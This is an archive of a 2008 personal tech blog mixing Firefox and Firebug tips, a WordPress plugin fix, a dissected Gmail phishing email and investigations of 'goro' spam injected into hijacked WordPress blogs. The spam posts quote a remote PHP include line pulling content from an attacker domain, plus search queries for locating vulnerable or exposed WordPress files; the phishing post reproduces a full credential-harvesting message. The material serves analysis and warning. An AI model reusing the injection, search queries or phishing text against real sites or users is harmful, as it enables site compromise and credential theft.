Kakkoi » Avice De’veréux

Start Firefox with multiple homepage

Avice De'veréux — Sat, 12 Jul 2008 15:03:26 +0000

Do you like looking at the Google search (default homepage) every time you open your Firefox or do want Firefox to open all your favorites visited website when its start?.

Learn how to set Firefox to open multiple homepage on start-up with this few simple step.

Open Firefox goto Tools » Options (for *nix try Edit » Preferences )
Select the “Main” tab
On the Homepage option add your favorite website URL or Keywords. Separate the URLs with the pipe | characters like the below example ↓
```
 http://google.com|digg|delicious
```
Ok you are done the next time Firefox start it will load all the website.

Where do I add the keywords?

Keywords are special tag for URL shortcut, bookmarks manager (ctrl+b).

Might be interest

Mozilla KB - Options Window

Firebug For Firefox 3

Avice De'veréux — Fri, 23 May 2008 04:33:18 +0000

After 6 months waiting Firebug 1.2 is out.

Firebug 1.2x stable release support all major Firefox version (Firefox 2.0.0.14 > Firefox 3 RC but not recommended for Firefox 3.0b5) . Compatible with Latest Firefox 3 RC 1.

Download Firebug 1.2x

Firebug 1.2x

Whats new in Firebug 1.2x

Latest version is more friendly and all suppose to be disabled behaviour is turn off by default. This new change will make sure that you wont have problem with high Ajax framework website (i.e., Google Gmail, Msn Live).

Improve performance - most of the automate HTTP reporting is disabled by default ( for all site).
Firebug Script and Net panels disabled by default.
More accurate Net reporting and Faster Javascript Debugging.

Check out firebug 1.2 release notes,screenshot, bug fixes & improvement.

Firebug Screenshot

Firebug 1.2 on Firefox 3 RC1.

Firebug Console

Firebug Net Panel Disabled by Default

Firebug Net Panel Enabled

Firebug JIT Script Debugger

Firebug CSS Panel

Firebug HTML Panel

Firebug 1.2x Bug Fixes & Improvements

Issue 1: Reload external Firebug window while its tab is hidden closes the window
Issue 2: Can’t set breakpoints in code called by unload event
Issue 4: Visiting error page causes external Firebug window to close itself
Issue 7 Long URLs in XHR spy rows should be cropped
Issue 14: Programatically disable firebug log from Javascript
Issue 38: console.group should allow optional collapse
Issue 43: Edit CSS behaviour - appending styles to the dom is unexpected. Contribution by tonygentilcore
Issue 65 show HTTP Status code on NET response
Issue 183: Configurable maximum output size
Issue 186 Only one line in net monitor for multiple xhr post requests
Issue 202 Clicking status bar error warning closes firebug
Issue 215 Display total page load time
Issue 216 Improve network monitor to include server-side processing time
Issue 266 PUT & DELETE requests appear as POST requests in firebug
Issue 316 Show HTTP request method and request content in Firebugs “Net” tab
Issue 325 PUT operations do not show contained entity in Net tab
Issue 327 “Net” tab: lowercase b for bytes (instead of B)
Issue 331 XHR resolves relative URIs to resource:// protocol
Issue 346 Fix Net Panel timings
Issue 349 Local file XHR events not listed in console
Issue 359 No entry in the Net tab for XHR when response content length is 0
Issue 361: Edit button gets stuck when reloading page whilst editing CSS. Contribution by tonygentilcore
Issue 393: Text overlayed on text in script editor window.
Issue 401 Net tab does not consider “application/javascript” a JS MIME type
Issue 402 Net tab tries to show previews of non-images with image file extensions
Issue 404 UI change to help users activate expensive debugging features only when they need them.
Issue 405 The Net panel consumes a lot of memory if there is a lot of XHR activity without page reload.
Issue 414 XHR Breaks When Using Firebug 1.1 beta when > 1 HTTP 302 Redirect Is Returned
Issue 421 onLoad of XHRSpyListener does not fire correctly
Issue 430 about:blank pages always show firebug as enabled
Issue 468 [feature request] fast [enable -> inspect element -> disable] ergonomy
Issue 474: base href applied to scripts
Issue 475 Show Return Code (HTTP HEADER-Response)
Issue 503 disable doesn’t work properly
Issue 567: Slow script warning in debugger.js on some pages
Issue 573: setting css background-color affects layout inspector. Contribution by tonygentilcore
Issue 583 Javascript console cannot work with Firefox 3 beta5
issue 599, Firebug Inspect Outline Does Not Show Up Over Web Page Elements
Issue 601 XHR in console shows stale/cached output
Issue 618: HTML: tab order, fixed by setting order properties on side panels.
Issue 619: Reopening firebug results in grey DOM, Layout or Style Pane, fixed by forceUpdate on syncSidePanel.
Issue 634 XHR request details not showing up
Issue 637 $ FireBug function overwrites existing $ function
Issue 659: firebug.js:1473 - “this.context.browser is undefined”
Issue 676 Exception in firebug-cache.js when visiting http://www.takebacktheweb.org/CaE.html
Issue 679 Firebug 1.2.0a27X blocking most AJAX calls
Issue 690 New zh-CN local file for Firebug 1.2

External Links

Blackhat SEO Spammer targeting High PR WordPress Blog

Avice De'veréux — Thu, 14 Feb 2008 20:14:48 +0000

I’ve been monitoring mattheaton.com “wordpress.net.in goro spam injections” for this past few months. Noticeably, the blackhat spamming method is changing dramatically. For those who are still unaware of Wordpress Goro Spam please read my earlier post → Wordpress.net.in Spam injection& Gaming Bluehost & Hostmonster CEO’s Blog.

thinkingphp.org (PR6) & jensfrake.com (PR7) has been hijacked by “Wordpress Blackhat SEO Spammer” for this month. Both sites were running on WordPress 2.3.2.

By now the

signature has been replaced with “Inline CSS” wrapper.

Cloacking Check on Mattheaton.com

Normal Browser: 32,246 characters - mattheaton-com-source.txt
Google bot: 34,646 characters - mattheaton-com-googlebot-source.txt
Difference: 2,400 characters

Cloacking Check on jensfrake.com & blog.jensfrake.com

Normal Browser: 59,580 characters - blogjensfrakecom.txt
Google bot: 59,699 characters - blogjensfrakecom-googlebot.txt
Difference: 119 characters

While scanning jensfrake.com their server return 400-500 error, so we had to scan his (clone) subdomain blog.jensfrake.com instead of the main site

This time around, you wont see the spam on both of this website, all the spam links is position out of the client view-port (top -3337px, left -2227px).

another mathematical jokes, l33t.

What’s new with Goro spam 2008

WordPress <= 2.3.2 is vulnerable to this attack.
Inject Spamlinks wrap with extra Inline CSS for cloacking
Target High PR Sites → PR5 and above

External Links

National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities

How to Setup Firefox 3 (beta) AutoComplete

Avice De'veréux — Sun, 06 Jan 2008 05:34:04 +0000

Firefox 3 (beta) is amazing and much-much better than its earlier versions. But there is some minor caveat that I think is a bit annoying (In my opinion) the Autocompletion. The autocomplete max results is set to 25 by default, if there is similar results when you type in any URL in the address bar, it will stretch down quite far (and disappeared within few seconds).

This is not something that I can’t live with, but it’s really straining my eyes every now and then. So here’s a quick guide on how you can manage the auto-complete results with your own preferences, complete with visual guide.

Firefox About Config

1. First, open Firefox Browser type about:config in address bar. (optionally you may uncheck the “show this warning next time” and proceed with clicking “I’ll be careful, I promise!”. :)

Setup Firefox Advanced Preferences

2.on about:config ‘filter’ input bar, type in browser.urlbar.maxRichResults.

3. Click on browser.urlbar.maxRichResults. On the Input Prompt Window type in your prefer value. For this guide I set it to 5 (recommended settings is around 5 - 10 ).

4. Result should be similar like the below example.

5. Finished, restart your Firefox browser and test the auto-complete.

Thanks for reading, merci

Firefox 2.0.0.12 Urgent Security Release

External Links

Firebug for Firefox 3.0b+

Avice De'veréux — Sat, 05 Jan 2008 06:54:31 +0000

I really lost without Firebug. Googling around I found this Firebug 1.1.0b10. Its compatible with Firefox 3.0b1, 3.0b2, 3.0b3, 3.0b4 & Latest 3.0b5 (beta 5) . Until Joe Hewitt release Firebug 1.1 (probably for firefox 3 release) You can try this Firebug 1.1 beta, download it at fireclipse. It working hu ho.

Excerpt from fireclipse

Firebug 1.1 is Firebug 1.05 by Joe Hewitt with enhancements and bug fixes by John J. Barton (IBM Almaden) and Max Stepanov (aptana)

The file is an XPI file that will add-on to Firefox as Firebug v1.1. Firefox’s updater will allow you to get new experimental versions until Firebug 1.1 is official.

Download

Firebug Release Archive

Firefox 2.0.0.12 Urgent Security Release

External Links

How to Fix Gravatars2 PHP5 HTTPRequest Fatal Error

Avice De'veréux — Wed, 26 Dec 2007 19:41:00 +0000

I used gravatars2 plugins to support my new sexy theme. There is some minor issue (throw fatal Error in PHP5.1) with this WordPress plugin. I did asked them to updated it but till today’s this bug still exists with Gravatars2 plugins.

This “fatal error” or conflict happen if you had PHP 5 ( 5.0 > 5.1 above) with HTTPRequest Modules Installed.

Plugin could not be activated because it triggered a fatal error.
Fatal error: Cannot redeclare class httprequest in /../wp-content/plugins/gravatars2.php on line 284

HTTPRequest Classname Conflict

It’s not that hard to fix this “Naming Conflicts”. All you need is “Search and Replace” HTTPRequest class name to different name (ie: _HTTPRequest, HTTP__Request) so it wont conflict with PHP HTTPRequest Standard Class. If you don’t know how to do this. Check the below lists. It wont take long.

Open wp-content/plugins/gravatars2.php or http://www.my-domain-name.com/wp-admin/plugin-editor.php?file=gravatars2.php
Find on line 284
```
class HTTPRequest
```
Replace with
```
class _HTTPRequest
```

Next find on line 323

function HTTPRequest($url, $timeout)

Replace with

function _HTTPRequest($url, $timeout)

Final step find on line 408

$hr = new HTTPRequest($url, $timeout);

Replace with

$hr = new _HTTPRequest($url, $timeout);

Save or upload back to wp-content/plugins/

Thats all

Gravatars2

For the record - “Gravatar2 developer doesn’t give support without donation”.

Excerpt from Kip Bond at zenpax.com

I am no longer giving support for this plugin without a donation — it’s becoming repetitive and not very rewarding. You can email me (kip @ this website’s hostname (zenpax.com)) with your question, and I can tell you what minimum donation amount is sufficient per the difficulty of the question. Note that this donation in no way obligates me to any contractual duties. It’s mostly a way to make sure that people have exhausted their own efforts at resolving their own problems before asking for my support. ~kip Bond

I hope these would explain some curiosity.

tips to php developer: used class_exists before declaring any user define class.

Email Phishing and Spams Trends - Be wary

Avice De'veréux — Tue, 11 Dec 2007 14:09:28 +0000

Below is typical phishing email I received on Dec 8, 2007. It was send to one of my active gmail accounts.

The Email Header

From: “Gmail Team”
Subject: Gmail Warning!!!! Verify Your Gmail Account To Avoid Close.
Part of the message ↓: Dear member,

This message is from gmail message center to all gmail free account owners
and premium account owners. We are currently upgrading our data base and
e-mail account center. We are deleting all unused gmail account to create
more space for new accounts.

*To prevent your account from closing, you will have to verify it below so
that we will know that it’s a present used account.*

* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!! [...]

Raw Email Content

This are part of of the raw message on gmail its not download via pop3. Certain meta info is not available as its got filtered by gmail services (spam automatic removal).

Delivered-To random-victims-name@gmail.com
Received: by 10.114.235.19 with SMTP id i19cs230694wah;
 Sat, 8 Dec 2007 04:27:12 -0800 (PST)
Received: by 10.141.20.7 with SMTP id x7mr3231780rvi.1197116792300;
 Sat, 08 Dec 2007 04:26:32 -0800 (PST)
Received: by 10.141.115.15 with HTTP; Sat, 8 Dec 2007 04:26:32 -0800 (PST)
Message-ID: <2f83b9150712080426n4a018c86mc2af4a4ed271f223@mail.gmail.com>
Date: Sat, 8 Dec 2007 13:26:32 +0100
From: "Gmail Team" 
Reply-To: customercareteamalert2@gmail.com
Subject: Gmail Warning!!!! Verify Your Gmail Account To Avoid Close.
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_Part_11145_31274162.1197116792293"

------=_Part_11145_31274162.1197116792293
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

 Dear Member*,* **
 * Account Alert*
***
 *
 *VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE !!!*
***GMAI L
*Dear Member*,*
 This message is from gmail message center to all gmail free account owners
and premium account owners. We are currently upgrading our data base and
e-mail account center. We are deleting all unused gmail account to create
more space for new accounts.

 *To prevent your account from closing, you will have to verify it below so
that we will know that it's a present used account.*

* CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!!

 Gmail! ID:.........................

 Password:........................

 Your Birthday:.................

 Your Country or Territory:...........
 Enter the Security
Characters:......... [image: Registration
Verification Code]
*

 *Warning!!! **Account owner that refuses to update his or her account
before two weeks of receiving this warning will lose his or her account
permanently. *
**
*Sincerely,*
*Gmail Team*

------=_Part_11145_31274162.1197116792293
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Dear Member,

 Account Alert

VERIFY YOUR GMAIL ACCOUNT NOW TO AVOID CLOSE !!!

GMAI
 L
Dear Member,

This message is from gmail message center to all gmail free account owners and premium account owners. We are currently upgrading our data base and e-mail account center. We are deleting all unused gmail account to create more space for new accounts.

To prevent your account from closing, you will have to verify it below so that we will know that it's a present used account.

CONFIRM YOUR IDENTITY. VERIFY YOUR FREE GMAIL ACCOUNT NOW !!! 

       Gmail! ID:.........................

        Password:........................

       Your Birthday:.................

       Your Country or Territory:........... 

       Enter the Security Characters:.........                                

Warning!!!   Account owner that refuses to update his or her account before two weeks of receiving this warning will lose his or her account permanently.

Sincerely,
Gmail Team

------=_Part_11145_31274162.1197116792293--

They used Outlook to published this email and leeched numbers of images across different “known” web services ↓

Image Sources

Gmail Logo: Google Presskit logo

Captcha : yahoo (SSL)

Gmail Logo 2: genbeta.com (might be their host)

Header: EbayStatic Server

Whats the motiff

It may seem funny to read the message as this are pretty much a script kiddies at work. I’m sure that most savvy users will not trust this types of threat. But what most people unaware of is the “Image” portions of the message. It can play a big role for expoiting email.

QuickInfo: Spam “images” trends start around june 2006 and earlier version of popular email client (Outlook and Thunderbird) doesn’t block images by default.

If you are familliar with Internet Security in general,you may notice that there is many attemp and proof of concept method in exploiting Images like “TIFF & JPEG“. Both of this vulnurebilities exists in Internet Explorer Browser and various microsoft windows products. While we can only make educated guesses as there is no real working proof yet.

My doodling scenario produce this ↓

Session “hacker” create a malicious server side image → proxy tunnel send to multiple email server → the curious victim open the email → steal client informations (cookie or server session cookie) → spoof the request → send RST back to client (reset) → dump the victims data in one instance. → write signature on victim email (avoid loop) → propogate using victims session → new net-worm is born

Try digging around VX Heavens & milw0rm Database you’ll find something to start thinkering.

Matt Cutts Guide on Labeling Image Attributes - Search Engine Optimizations Tips

Avice De'veréux — Sun, 09 Dec 2007 16:34:31 +0000

IMG ALT attribute is one of favorites places for spamming keywords. (Blackhat SEO).

As this has been a trend lately so Matt Cutts (Google Head of Webspam Team) provide a general guide on applying “proper” ALT attributes inside image tags. Check out the video ↓.

Video posted by Ríona MacNamara at Google Webmaster Central Blog.

Every Stupid Thing, We Did First - Bill Gates

Avice De'veréux — Sat, 08 Dec 2007 20:26:01 +0000

Jonathan Snook is having a good evening at Mix’n'mash Conferences 2007. His simple question spurs out hilarious response from bill gates. Read all the transcript at snook.ca.

Matt Heaton BlueHost HostMonster CEO Official Blog Hacked

Avice De'veréux — Sat, 01 Dec 2007 09:55:53 +0000

Dec 11 2007 - Matt Heaton Blog’s has been cleansed. ATM he’s using latest version of WordPress (2.3.x). And also most of the blogs lists in this articles has been upgrade.

Jan 26th, 2008 - Seem like bluehost engineer did a bad job at cleaning, the goro spam is back.

Just after the recent issue on wordpress.com.cn now there is new wordpress imitater. A remote spamware injection by wordpress.net.in

I was reading one of Matt Heaton posted 2 days ago when I found bunch of spamsware link on his wordpress footer.

Matt’s is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to howardowens.com/?order=XX page.

Lookup for howardowens.com

The below diagram explained the lookup results for howardowens.com. click on the image to enlarge.

Surprisingly the spammer website is also host by bluehost.com (69.89.16.0/20,74.220.192.0/19 ,69.89.16.4 -> box183.bluehost.com).

Tracking the spam sources.

Viewing mattheaton.com html sources I found some hint and start searching for xanax intext:id=\”goro\”. Google return 2 results for this query.

1. Wordpress Support: php get footer adding spam code?
2. elijahzarwan.net: div id=”Goro” (nice headline)

Both site suggest same type of php injection methods
include('http://wordpress.net.in/statcounter.php');

The statcounter.php is just normal text/plain full with spam links. The spam content on Matt Heaton blog is randomly generate from http://wordpress.net.in/[random]/ random = 1 - 9.

Raw whois for wordpress.net.in

Domain ID:D2500581-AFIN
Domain Name:WORDPRESS.NET.IN
Created On:22-Apr-2007 12:01:55 UTC
Last Updated On:22-Jun-2007 02:26:40 UTC
Expiration Date:22-Apr-2008 12:01:55 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN)
Status:OK
Registrant ID:DI_4275224
Registrant Name:Mick Jagger
Registrant Organization:N/A
Registrant Street1:1 Red Square
Registrant City:Moscow
Registrant State/Province:Massachusetts
Registrant Postal Code:123592
Registrant Country:RU
Registrant Phone:+007.7581235641
Registrant Email:mkk.goro@bk.ru
Admin ID:DI_4275224
Admin Name:Mick Jagger
Admin Organization:N/A
Admin Street1:1 Red Square
Admin City:Moscow
Admin State/Province:Massachusetts
Admin Postal Code:123592
Admin Country:RU
Admin Phone:+007.7581235641
Admin Email:mkk.goro@bk.ru
Tech ID:DI_4275224
Tech Name:Mick Jagger
Tech Organization:N/A
Tech Street1:1 Red Square
Tech City:Moscow
Tech State/Province:Massachusetts
Tech Postal Code:123592
Tech Country:RU
Tech Phone:+007.7581235641
Tech Email:mkk.goro@bk.ru
Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM
Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM
Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM
Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM

Note: The registrant address on 1 red square is a famous restaurant in Moscow.

Its pretty obvious that wordpress.net.in belong to registrar in India.

Live example wordpress.net.in injection

Google query for warning “[function.include]” allintext: “wordpress.net.in” . Used fiddler or any http-inspector to trace the full header request.

1 Evan Morris: Wordpress 2.0.6 | url | screenshot
2 carwax: Wordpress 1.5.2 | url | screenshot
3 aabenthus.biz: Wordpress 2.0.x | url | screenshot
4 mythinger.com: Wordpress 2.0.2 | url | screenshot
5 classicalanglican.net: Wordpress 2.0.2 | url | screenshot
6 echo9er.net: WordPress 1.5.1 | url | screenshot
7 boyarick.com: Wordpress 2.0.2 | url | screenshot

Google Directory search for class-mail.php

Search for class-mail.php in open directory (public).
“parent directory” class-mail.php -html -htm –php -shtml -md5 -md5sums

jean-cyril.com - wp-includes · spams link redirect to www.901am.com/?page=2157. jean-cyril.com has wp-info.txt inside his wp-includes directory. This text files hold unserialize database password and stuff.
floaridablog.org - wp-includes · spams redirect to communications.uml.edu/sunrise/?id=1076 (University of Massachusetts Lowell) the offending spams page has been removed by UML maintainer.

Hiding from search engine Spiders

First, I did some more comparative search at archive.org for howardowens.com and mattheaton.com. It turn out both of this sites has been stop from IA Archiver few months before the spams start showing on their footer. You will need to check howardowens index on archive.org so you can understand my suspicious.

http://web.archive.org/web/*/http://www.howardowens.com
http://web.archive.org/web/*/http://www.mattheaton.com

Out of boredom I cloaked myself as the following agents.

Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com
Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com
Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com

Not much change on both of these sites. Then I read the status header, it return 404 instead of 200. Nice tricks for stopping crawler & spider from spying their joy-ride-spamhouse.

Summary

bits & bytes from this accident we knew that

Most of the site inject are running on wordpress 2.0.6 & below
allow_furl_open is set to true for this injection to work
Most of the blogs owner is unaware about the spams links (cloacking)

Checkout Murray access log, it will give you some ideas with the remote injections methods.

Update

Dec 03 2007: All the spams link to howardowens.com page has been removed. I havent talk with howardowens but I assume howard’s site is being injected the same way like Matt Heaton blog.
Dec 04 2007: Mattheaton.com has a minor update, the spams now inject on both header and footer.
tangonoticias.com:7070/d_pill/577.html.
As tangonoticias.com is running on Joomla CMS they create a static “Wordpress” on port 7070 (Real Network Server & RSTP Port). This is probably a work of different attacker, taking advantage of Matt heaton blindspot. Google Cache (Nov 12)
Dec 11 2007: Matt heaton has been purified. He’s now using latest version of Wordpress (2.3.1). You can still view it on cached thought & screenshot.

How to Removed wordpress.net.in Spam Injection
Jan 31st, 2008 - Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II

Kakkoi » Avice De’veréux

Start Firefox with multiple homepage

Where do I add the keywords?

Might be interest

Firebug For Firefox 3

Download Firebug 1.2x

Whats new in Firebug 1.2x

Firebug Screenshot

Firebug Console

Firebug Net Panel Disabled by Default

Firebug Net Panel Enabled

Firebug JIT Script Debugger

Firebug CSS Panel

Firebug HTML Panel

Firebug 1.2x Bug Fixes & Improvements

External Links

Blackhat SEO Spammer targeting High PR WordPress Blog

Cloacking Check on Mattheaton.com

Cloacking Check on jensfrake.com & blog.jensfrake.com

What’s new with Goro spam 2008

Related Post

External Links

How to Setup Firefox 3 (beta) AutoComplete

Firefox About Config

Setup Firefox Advanced Preferences

Related Posts

External Links

Firebug for Firefox 3.0b+

Download

Related Posts

External Links

How to Fix Gravatars2 PHP5 HTTPRequest Fatal Error

HTTPRequest Classname Conflict

Gravatars2

Related Links

Email Phishing and Spams Trends - Be wary

The Email Header

Raw Email Content

Whats the motiff

Matt Cutts Guide on Labeling Image Attributes - Search Engine Optimizations Tips

Every Stupid Thing, We Did First - Bill Gates

Matt Heaton BlueHost HostMonster CEO Official Blog Hacked

Lookup for howardowens.com

Tracking the spam sources.

Raw whois for wordpress.net.in

Live example wordpress.net.in injection

Google Directory search for class-mail.php

Hiding from search engine Spiders

Summary

Update

Related Post

External Links